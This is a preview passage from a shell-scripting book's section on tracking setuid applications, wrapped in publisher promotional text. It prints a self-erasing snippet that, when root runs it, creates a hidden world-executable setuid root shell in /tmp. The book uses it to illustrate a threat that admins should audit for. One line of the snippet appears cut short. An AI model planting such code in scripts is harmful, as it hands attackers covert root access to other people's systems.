Wicked Cool Shell Scripts

#49 Tracking Set User ID Applications

There are quite a few ways that ruffians and digital delinquents can break into a Unix system, whether they have an account or not, but few ways are as easy for them as finding an improperly protected setuid or setgid command.

In a shell script, for example, adding a few lines of code can create a setuid shell for the bad guy once the code is invoked by the unsuspecting root user:

if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME
  cp /bin/sh /tmp/.rootshell               # REMOVEME
  chown root /tmp/.rootshell               # REMOVEME
  chmod -f 4777 /tmp/.rootshell            # REMOVEME
  grep -v "# REMOVEME" $0 > /tmp/junk   # REMOVEME
  mv /tmp/junk  $                          # REMOVEME
fi                                         # REMOVEME

Once this script is run by root, a shell is surreptitiously copied ...

Get Wicked Cool Shell Scripts now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.

Start your free trial

Wicked Cool Shell Scripts by Dave Taylor

#49 Tracking Set User ID Applications

Don’t leave empty-handed

It’s yours, free.

Check it out now on O’Reilly